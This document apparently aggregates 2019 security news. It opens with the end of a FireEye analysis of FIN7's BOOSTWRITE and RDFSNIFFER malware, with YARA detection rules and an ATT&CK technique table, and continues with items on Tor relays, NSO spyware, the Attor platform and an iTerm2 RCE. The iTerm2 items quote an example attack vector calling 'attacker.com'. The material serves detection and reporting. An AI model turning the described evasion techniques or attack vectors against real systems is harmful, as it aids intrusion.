     $weetPDB = /RSDS[\x00-\xFF]{20}[a-zA-Z]?:?\\[\\\s|*\s]?.{0,250}\\DWriteImpl[\\\s|*\s]?.{0,250}\.pdb\x00/ nocase
     (uint16(0) == 0x5A4D) and uint32(uint32(0x3C)) == 0x00004550 and $weetPDB and filesize < 6MB

Figure 6: Applying BOOSTWRITE’s PDB path to a Yara rule

We can apply this same concept across other executable traits, such as BOOSTWRITE’s export DLL name (DWriteImpl.dll), to create quick and easy rules that can aid in quick discovery as seen in Figure 7.

rule Exports_BOOSTWRITE
     author = "Steve Miller (@stvemillertime) & Nick Carr (@itsreallynick)"
     $exyPants = "DWriteImpl.dll" nocase
     uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550 and $exyPants at pe.rva_to_offset(uint32(pe.rva_to_offset(pe.data_directories[pe.IMAGE_DIRECTORY_ENTRY_EXPORT].virtual_address) + 12)) and filesize < 6MB

Figure 7: Applying BOOSTWRITE’s export DLL names to a Yara rule (Note: this rule was updated following publication. It previously read "module_ls.dll", which is for Turla and unrelated.)

Of course, resilient prevention capabilities are needed and to that end, FireEye detects this activity across our platforms. Table 6 contains several specific detection names from a larger list of detection capabilities that captured this activity natively.


Signature Name

Endpoint Security

MalwareGuard ML detection (unsigned variants)

Network Security and Email Security

Malware.binary.dll (dynamic detection)
MalwareGuard ML detection (unsigned variants)
APTFIN.Dropper.Win.BOOSTWRITE (network traffic)
APTFIN.Backdoor.Win.RDFSNIFFER (network traffic)
FE_APTFIN_Dropper_Win_BOOSTWRITE (static code family detection)
FE_APTFIN_Backdoor_Win_RDFSNIFFER (static code family detection)

Table 6: FireEye detection matrix

Don’t Sweat the Techniques – MITRE ATT&CK Mappings






Data Encrypted

BOOSTWRITE encodes its payloads using a ChaCha stream cipher with a 256-bit key and 64-bit IV to evade detection


Obfuscated Files or Information

BOOSTWRITE encodes its payloads using a ChaCha stream cipher with a 256-bit key and 64-bit IV to evade detection


DLL Search Order Hijacking

BOOSTWRITE exploits the applications’ loading of the ‘gdi’ library, which loads the ‘gdiplus’ library, which ultimately loads the local ‘Dwrite’ dll


Code Signing

BOOSTWRITE variants were observed signed by a valid CA


Execution through Module Load

BOOSTWRITE exploits the applications’ loading of the ‘gdi’ library, which loads the ‘gdiplus’ library, which ultimately loads the local ‘Dwrite’ dll


Deobfuscate/Decode Files or Information

BOOSTWRITE decodes its payloads at runtime using using a ChaCha stream cipher with a 256-bit key and 64-bit IV






Execution through API

RDFSNIFFER hooks several Win32 API functions intended to enable it to tamper with NCR Aloha Command Center Client sessions or hijack elements of its user-interface


File Deletion

RDFSNIFFER has the capability of deleting local files



RDFSNIFFER hooks several Win32 API functions intended to enable it to tamper with NCR Aloha Command Center Client sessions or hijack elements of its user-interface


The authors want to thank Steve Elovitz, Jeremy Koppen, and the many Mandiant incident responders that go toe-to-toe with FIN7 regularly, quietly evicting them from victim environments. We appreciate the thorough detection engineering from Ayako Matsuda and the reverse engineering from FLARE’s Dimiter Andonov, Christopher Gardner and Tyler Dean. A special thanks to FLARE’s Troy Ross for the development of his PE Signature analysis service and for answering our follow-up questions. Shout out to Steve Miller for his hot fire research and Yara anomaly work. And lastly, the rest of the Advanced Practices team for both the unparalleled front-line FIN7 technical intelligence expertise and MITRE ATT&CK automated mapping project – with a particular thanks to Regina Elwell and Barry Vengerik.

Canada’s CIO Strategy Council publishes national AI standards

In what it claims is a world first, Canada’s CIO Strategy Council has released a new set of standards to help organizations responsibly deploy emerging technologies with machine learning running under the hood. The not-for-profit organization earned its accreditation to develop National Standards of Canada from the Standards Council of Canada (SCC) earlier this year.…

New Comic Videos Take CISO/Security Vendor Relationship to the Extreme

Today's CISOs operate in an overly intensive environment. As the ones who are tasked with the unenviable accountability for failed protection and successful breaches, they must relentlessly strive to improve their defense lines with workforce education, training their security teams and last but definitely not least — looking for products that will upgrade and adjust their security against

Phishing Attack Possibly Affected 68K Patients of The Methodist Hospitals

The Methodist Hospitals, Inc. revealed that a phishing attack potentially affected the information of approximately 68,000 patients. According to its Notice of Data Incident, the non-profit healthcare system located in Gary, Indiana detected unusual activity involving an employee’s email account back in June 2019. The Methodist Hospitals (‘Methodist’) responded by launching an investigation into what […]… Read More

The post Phishing Attack Possibly Affected 68K Patients of The Methodist Hospitals appeared first on The State of Security.

Tor Project is going to remove End-Of-Life relays from the network

Maintainers at the Tor Project have removed from its network more than 800 relay servers running outdated and EOL versions of the Tor software.

Currently, the Tor network is composed of more than 6000 relays, some of them running outdated Tor software versions (in some cases back to the 0.2.4.x versions). Other relays are running the latest Tor software in nightly builds and alpha releases. Maintainers of the Tor Project announced they have removed relay servers running outdated and EOL versions of the Tor software.

Tor Project experts pointed out that they currently maintain only 5 Tor version series, 0.2.9.x (LTS), 0.3.5.x (LTS), 0.4.0.x, 0.4.1.x, 0.4.2.x (Stable on Dec 15th, 2019).

Now the maintainers of the project announced to have removed roughly 13.5% of the relay servers, 750 acting as Tor middle relays and 62 as exit relays.

The presence of End-Of-Life relays in the Tor Network has multiple negative impacts on network stability and security, it also impacts maintenance activities because it is not easy to roll out important fixes and new features for them.

“In the past weeks, we’ve taken steps to contact every relay operator with a valid ContactInfo field to ask them to upgrade to the latest stable release. The Tor relay community was informed via the tor-relays mailing list on September 3rd 2019 of this upcoming change.” reads the announcement published by the Tor Project.

“The End-Of-Life relays in the network currently make up just over 12% of the total bandwidth, or around 750 relays. Out of these, only 62 are Exit relays accounting for only 1.68% of the total Exit traffic. We expect a minor impact on the size of the network, and a small drop in the Metrics graph.”

The maintainers expect a new Tor stable release in November, it will reject End-Of-Life relays by default. Until then, the maintainers will reject obsolete relays using their fingerprints.

Instruction to upgrading End-Of-Life relays are included in the announcement.

Pierluigi Paganini

(SecurityAffairs – Tor, privacy)

The post Tor Project is going to remove End-Of-Life relays from the network appeared first on Security Affairs.

2FA, HTTPS and private browsing still a mystery to most Americans

Most US adults know what phishing scams are and where they occur, what browser cookies do, and that advertising is the largest source of revenue for most social media platforms, a recent Pew Research Center survey aimed at testing American’s digital knowledge has revealed. But, sadly, it has also shown that most respondents don’t know what https:// means, what the private browsing option does, that WhatsApp and Instagram are owned by Facebook, and can’t identify … More

The post 2FA, HTTPS and private browsing still a mystery to most Americans appeared first on Help Net Security.

Wi-Fi Hotspot Tracking

Free Wi-Fi hotspots can track your location, even if you don't connect to them. This is because your phone or computer broadcasts a unique MAC address.

What distinguishes location-based marketing hotspot providers like Zenreach and Euclid is that the personal information you enter in the captive portal­ -- like your email address, phone number, or social media profile­ -- can be linked to your laptop or smartphone's Media Access Control (MAC) address. That's the unique alphanumeric ID that devices broadcast when Wi-Fi is switched on.

As Euclid explains in its privacy policy, "...if you bring your mobile device to your favorite clothing store today that is a Location -- ­and then a popular local restaurant a few days later that is also a Location­ -- we may know that a mobile device was in both locations based on seeing the same MAC Address."

MAC addresses alone don't contain identifying information besides the make of a device, such as whether a smartphone is an iPhone or a Samsung Galaxy. But as long as a device's MAC address is linked to someone's profile, and the device's Wi-Fi is turned on, the movements of its owner can be followed by any hotspot from the same provider.

"After a user signs up, we associate their email address and other personal information with their device's MAC address and with any location history we may previously have gathered (or later gather) for that device's MAC address," according to Zenreach's privacy policy.

The defense is to turn Wi-Fi off on your phone when you're not using it.

EDITED TO ADD: Note that the article is from 2018. Not that I think anything is different today....

Coleen Rooney and Rebekah Vardy in Public Spat Over ‘Leaked Stories’

Coleen Rooney and Rebekah Vardy in Public Spat Over ‘Leaked Stories’

Reports emerged yesterday that Coleen Rooney, wife of professional footballer Wayne Rooney, publicly accused Rebekah Vardy, wife of footballer Jamie Vardy, of leaking personal information about her to tabloid newspaper The Sun. Vardy was quick to refute the claims.

In a lengthy social media post on October 9, Rooney wrote: “For a few years now someone I trusted to follow me on my personal Instagram account has been consistently informing THE SUN newspaper of my private posts and stories.”

She went on to claim that “there has been so much information given to them about me, my friends and my family – all without my permission or knowledge.”

In an attempt to find out who was responsible, Rooney explained how she blocked all users from viewing her Instagram stories, except for one person, and spent five months posting a series of false stories to see if they ended up being leaked to The Sun, which they eventually did.

“Now I know for certain which account/individual it’s come from,” Rooney continued. “I have saved and screenshotted all the original stories which clearly show just one person has viewed them. It’s………Rebekah Vardy’s account.”

In response, Vardy Tweeted to deny any knowing involvement in the issue, suggesting there could have been some sort of unaccounted for activity on her Instagram account which may have led to the leaks: “I never speak to anyone about this [personal stories and information] as various journalists have asked me to over the years can vouch for.

“Over the years various people have had access to my insta & just this week I found I was following people I didn’t know and have never followed myself.

“If you thought this was happening you could have told me & I could have changed my passwords to see if it stopped.”

Researchers Discover Spy Platform with GSM Fingerprinting

Researchers Discover Spy Platform with GSM Fingerprinting

Researchers at ESET have discovered several high-profile espionage attacks aimed at government and diplomatic entities in Eastern Europe.

According to the analysis, the attacks were conducted using a previously unreported cyber-espionage platform, which is notable for its modular architecture, along with two prominent features: the AT protocol used by one of its plugins for GSM fingerprinting, and Tor, which is employed for its network communications. Given these features, ESET researchers have named the platform Attor.

“The attackers who use Attor are focusing on diplomatic missions and governmental institutions,” said Zuzana Hromcová, ESET malware researcher. “These attacks, ongoing since at least 2013, are highly targeted at users of these Russian services, specifically those who are concerned about their privacy.”

ESET explained that Attor consists of a dispatcher and loadable plugins that rely on the dispatcher for implementing basic functionalities. The plugins are delivered by to the compromised computer as encrypted DLLs and are only fully recovered in memory. “As a result, without access to the dispatcher, it is difficult to obtain Attor’s plugins and to decrypt them,” added Hromcová.

The platform targets specific processes, including processes associated with Russian social networks and some encryption/digital signature utilities.

Among Attor’s capabilities implemented by its plugins, two stand out for their uncommon features: network communication and the fingerprinting of GSM devices.

Attor’s infrastructure for C&C communications spans four components – the dispatcher providing encryption functions and three plugins implementing the FTP protocol, the Tor functionality and the actual network communication. “This mechanism makes it impossible to analyze Attor’s network communication unless all the pieces of the puzzle have been collected,” explained Hromcová.

“Fingerprinting a device can serve as a base for further data theft. If the attackers learn about the type of connected device, they can craft and deploy a customized plugin that would be able – using AT commands – to steal data from that device and make changes in it, including changing the device’s firmware,” concluded Hromcová.

NCSC announces major change to the Cyber Essentials scheme

Over the past five years, the Cyber Essentials scheme has been vital in helping protect organisations from some of the most common causes of data breaches.

However, the NCSC (National Cyber Security Centre) has announced a change to the way the scheme is run. From April 2020, the five Cyber Essentials accreditation bodies will be replaced by one, the IASME Consortium.

There will be a transition period, with the current scheme operating as normal until 31 March 2020.

After that date, new applications will be handled under the revised Cyber Essentials scheme through the IASME Consortium. Organisations still in the process of seeking certification will have until 30 June 2020 to complete their application.

Does this affect IT Governance?

In support of this change, IT Governance will become an IASME-accredited certification body from April next year.

We will continue to provide the high level of cost-effective ongoing service our clients expect from us and will ensure the transition to the new arrangements is seamless.

In the meantime, and in line with current arrangements supported by the NCSC, our clients will continue to be certified under CREST, and all existing and new certifications will continue to be valid and in line with current requirements.

You can find out more about Cyber Essentials and the ways IT Governance can help you certify on our website.

The post NCSC announces major change to the Cyber Essentials scheme appeared first on IT Governance Blog.

Amnesty claims that 2 Morocco rights advocates were targeted by NSO Group spyware

NSO Group ‘s surveillance spyware made the headlines again, this time the malware was used to spy on 2 rights activists in Morocco according Amnesty International.

Amnesty International collected evidence of new abuses of the NSO Group ‘s surveillance spyware, this time the malware was used to spy two rights activists in Morocco.

Experts at Amnesty International analyzed the device of evidence of Abdessadak El Bouchattaoui and confirmed it was targeted repeatedly with malicious SMS messages that carried links to websites connected to NSO Group’s Pegasus spyware.

“After checking his devices for evidence of targeting, Amnesty International was able to confirm that Abdessadak El Bouchattaoui was indeed targeted repeatedly with malicious SMS messages that carried links to websites connected to NSO Group’s Pegasus spyware.” reads the analysis published by Amnesty International.

The organization also discovered that the spyware was also used to spy on Maati Monjib, the right group believes the operation is part of state-sponsored repression of human rights defenders.

Bouchattaoui is a lawyer and HRD, in February 2017, a court in Al Hoceima sentenced him to 20 months in prison and a fine for online posts in which he criticized the use of excessive force by the authorities during the social justice protests in the Hirak El-Rif across 2016 and 2017. Monjib is a historian and a columnist, co-founder of the NGO Freedom that in 2015 was accused of threatening the internal security of the state ”through “propaganda.”

NSO Group Pegasus

The victims were targeted with messages related to the Hirak El-Rif movement and the subsequent repression by the Moroccan security forces. The messages included links that once clicked by the victims will start the attack chain that would allow the attacker to remotely control the device.

The links used in these attacks are similar to the ones detected by in June 2018 by Amnesty International in operations against an Amnesty staff member and a Saudi HRD.

“SMS messages sent to Moroccan Human Rights Defenders, as documented in this report, also carry similar links to the same set of Internet infrastructure attributed to NSO Group.” states the report.

“NSO Group is known to only sell its spyware to government intelligence and law enforcement agencies, raising serious concerns that Moroccan security agencies are behind the surveillance,”

NSO Group refuses any accusation and claims that its surveillance technology is only used for lawful purposes. 

In May, Amnesty International filed a lawsuit against Israeli surveillance firm NSO, the lawsuit was filed in Israel by about 50 members and supporters of the human rights group. The organization calls on the Israeli ministry of defence to ban the export of the Pegasus surveillance software developed by NSO Group.

Pierluigi Paganini

(SecurityAffairs – NSO Group, hacking)

The post Amnesty claims that 2 Morocco rights advocates were targeted by NSO Group spyware appeared first on Security Affairs.

Hashtag Trending- You need to install this Windows update; macOS upgrade woes; Twitter phone number mess

Microsoft asks users to install a critical patch once again, Apple macOS Catalina messes up music tools, Twitter uses authentication phone numbers to create ads. That’s all the tech news that’s trending today. It’s Thursday, Oct. 10th, and I’m your host, Tom Li. First, trending on Google, Microsoft is urging users to install a critical…

Critical command execution vulnerability in iTerm2 patched, upgrade ASAP!

A critical vulnerability (CVE-2019-9535) in iTerm2, a macOS terminal emulator frequently used by developers and system administrators, could allow attackers to take control of a target system. “An attacker who can produce output to the terminal can, in many cases, execute commands on the user’s computer,” Mozilla explained. “Example attack vectors for this would be connecting to an attacker-controlled SSH server or commands like curl http://attacker.com and tail -f /var/log/apache2/referer_log. We expect the community will … More

The post Critical command execution vulnerability in iTerm2 patched, upgrade ASAP! appeared first on Help Net Security.

Smashing Security #149: Falling in love with fraudsters

We take a trip to Staten Island, New York, to hear how a case of cyberstalking resulted in the arrest of 20 alleged mobsters, learn about the nude photo-loving insider threat at Yahoo, and discover how fraudsters might be boosting Match.com’s profits.

All this and much more is discussed in the latest edition of the award-winning “Smashing Security” podcast by Graham Cluley and Carole Theriault, joined this week by Ran Levi of “Malicious Life.”

#DTXEurope: Defense Now Far Harder Than Attack, Warns Security Researcher

#DTXEurope: Defense Now Far Harder Than Attack, Warns Security Researcher

At Digital Transformation EXPO Europe Samy Kamkar, independent security researcher and ‘Samy’ MySpace computer worm creator, reflected upon the current cyber-threat landscape and warned that defenders are being challenged to a far greater degree than ever before.

That’s because of the ever-increasing numbers of internet-connected devices being used across the world, extremely high levels of information being shared online and the extremely sophisticated technology cyber-criminals now adopt in their attacks.

“Security is challenging,” Kamker said. “It’s very difficult to secure everything and as somebody who is trying to defend, you have maybe 100 holes and maybe you can cover 99 of them. For an attacker it’s much easier, you only need to find one problem, one hole to break in.”

So attacks are now very difficult to stop, he added, and that’s because they are now possible to carry out “with low cost tools – tools that even you and I can purchase, with open source software and hardware that anyone can access.”

Staying secure is therefore not easy, Kamkar warned, but he said there are three fundamental steps that can be taken to make better security more achievable.

The first “is using two-factor authentication wherever you can.”

Next, “do not use SMS two-factor authentication. The SMS network is like your local area network – anyone with access can essentially take over any phone number. Do not use SMS if you have the ability to use something like an authenticator or software on your mobile device.”

Lastly, “please use a password manager. There are pros and cons, and yes you are storing passwords in one place that’s centralized, but do anything [you can] to prevent you from using the same password over and over again, which is how all of the largest attacks I have ever seen occurred,” Kamkar concluded.

What is the ISO 27000 series of standards?

The ISO/IEC 270001 family of standards, also known as the ISO 27000 series, is a series of best practices to help organisations improve their information security.

Published by ISO (the International Organization for Standardization) and the IEC (International Electrotechnical Commission), the series explains how to implement an ISMS (information security management system).

An ISMS is a systematic approach to risk management, containing measures that address the three pillars of information security: people, processes and technology.

The series consists of 46 individual standards, including ISO 27000, which provides an introduction to the family as well as clarifying key terms and definitions.

You don’t need to know every standard inside out to understand how the series works, and some won’t be relevant to your organisation, but there are a few core ones that you should be familiar with.

ISO 27001

This is the central standard in the ISO 27000 series, containing the implementation requirements for an ISMS. This is important to remember, as ISO 27001 is the only standard in the series that organisations can be audited and certified against.

That’s because it contains an overview of everything you must do to achieve compliance, which is expanded upon in each of the following standards.

ISO 27002

This is a supplementary standard that discusses the information security controls that organisations might choose to implement.

Organisations are only required to adopt controls that they deem relevant – something that will become apparent during a risk assessment.

The controls are outlined in Annex A of ISO 27001, but whereas this is essentially a quick rundown, ISO 27002 contains a more comprehensive overview, explaining how each control works, what its objective is and how you can implement it.

ISO 27017 and ISO 27018

These standards were introduced in 2015, explaining how organisations should protect sensitive information in the Cloud. This has become especially important recently as organisations migrate much of their sensitive information on to online servers.

ISO 27017 is a code of practice, providing extra information about how to apply the Annex A controls to information stored in the Cloud.

Under ISO 27001, you have the choice to treat these as a separate set of controls. So, you’d pick a set of controls from Annex A for your ‘normal’ data and a set of controls from ISO 27017 for data in the Cloud.

ISO 27018 works in essentially the same way but with extra consideration for personal data.

ISO 27701

This is the newest standard in the ISO 27000 series, covering what organisations must do when implementing a PIMS (privacy information management system).

It was created in response to the GDPR (General Data Protection Regulation), which instructs organisations to adopt “appropriate technical and organisational measures” to protect personal data but doesn’t state how they should do that.

ISO 27701 fills that gap, essentially bolting privacy processing controls onto ISO 27001.

Why use an ISO 27000-series standard?

Information security breaches are one of the biggest risks that organisations face. Sensitive data is used across all areas of businesses these days, increasing its value for legitimate and illegitimate use.

Countless incidents occur every month, whether it’s cyber criminals hacking into a database or employees losing or misappropriating information. Wherever the data goes, the financial and reputational damage caused by a breach can be devastating.

That’s why organisations are increasingly investing heavily in their defences, using ISO 27001 as a guideline for effective security.

ISO 27001 can be applied to organisations of any size and in any sector, and the framework’s broadness means its implementation will always be appropriate to the size of the business.

You can find out how to get started with the Standard by reading Information Security & ISO 27001: An introduction.

This free green paper explains:

  • What ISO 27001 is, how an ISMS works and how it relates to ISO 27002;
  • The importance of risk assessments and risk treatment plans;
  • How the Standard helps you meet your legal and regulatory obligations; and
  • How to begin your ISMS implementation process.

The post What is the ISO 27000 series of standards? appeared first on IT Governance Blog.

Ops, popular iTerm2 macOS Terminal App is affected by a critical RCE since 2012

Security experts discovered a critical remote code execution vulnerability, tracked as CVE-2019-9535, in the GPL-licensed iTerm2 macOS terminal emulator app.

Security experts at cybersecurity firm Radically Open Security (ROS) discovered a 7-year old critical remote code execution vulnerability in the GPL-licensed iTerm2 macOS terminal emulator app.

The iTerm2 macOS terminal emulator app is one of the most popular open-source replacements for Mac’s built-in terminal app.

The RCE flaw tracked as CVE-2019-9535 was discovered as part of an independent security audit funded by the Mozilla Open Source Support Program (MOSS).

“A security audit funded by the Mozilla Open Source Support Program (MOSS) has discovered a critical security vulnerability in the widely used macOS terminal emulator iTerm2.” reads the security advisory published by Mozilla. “During the audit, ROS identified a critical vulnerability in the tmux integration feature of iTerm2; this vulnerability has been present in iTerm2 for at least 7 years. An attacker who can produce output to the terminal can, in many cases, execute commands on the user’s computer.”

The RCE vulnerability resides in the tmux integration feature of iTerm2, it could be exploited by an attacker to execute arbitrary commands by providing malicious output to the terminal.

The experts published a video PoC that shows how to exploit the vulnerability by producing output to the terminal. Possible attack vectors would be connecting to an attacker-controlled SSH server or commands like curl http://attacker.com and tail -f /var/log/apache2/referer_log.

“Typically, this vulnerability would require some degree of user interaction or trickery; but because it can be exploited via commands generally considered safe, there is a high degree of concern about the potential impact,” Mozilla concludes.

The iTerms2 version 3.3.6 addresses the flaw that affects prior versions.

Pierluigi Paganini

(SecurityAffairs – iTerms2, hacking)

The post Ops, popular iTerm2 macOS Terminal App is affected by a critical RCE since 2012 appeared first on Security Affairs.

Build or buy: What to consider when deploying on-premise or cloud-based PKI

Public Key Infrastructure (PKI), once considered an IT table stake, has transformed from a tool used to protect websites to a core digital identity management function within the cybersecurity framework. Today’s PKI establishes and manages digital identities across people, applications and devices within the enterprise. IT teams are deploying PKI to combat several growing cybersecurity threats too, from ransomware and phishing attacks to IoT device hijacking. PKI remains a core component within the larger IT … More

The post Build or buy: What to consider when deploying on-premise or cloud-based PKI appeared first on Help Net Security.